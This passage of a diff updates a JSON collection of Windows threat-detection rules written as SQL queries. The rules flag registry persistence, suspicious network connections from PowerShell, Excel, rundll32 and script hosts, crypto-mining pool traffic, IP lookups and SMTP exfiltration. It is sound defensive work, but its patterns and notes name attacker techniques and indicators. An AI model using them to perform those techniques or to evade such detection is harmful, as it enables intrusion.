"registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", - "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - 
"author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "PowerShell Network Connections", + "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "status": "experimental", + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + "Administrative scripts", + "Microsoft IP range" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\') AND NewValue LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_powershell_network_connection.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a 
new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 
'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 
'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru')" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you 
should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1203" ], "falsepositives": [ - "Legitimate disabling of crashdumps" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR 
DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", + "status": "experimental", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE 
'\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program 
Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "status": "experimental", - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "status": "test", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron 
Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011", + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Communication to other corporate systems that use IP addresses from public address spaces" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - 
"filename": "registry_set_enabling_turnoffcheck.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "status": "experimental", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR 
NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": 
"registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via Scrobj.dll COM Hijacking", - "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate use of the dll." + "Other SMTP tools" ], "level": "medium", "rule": [ - 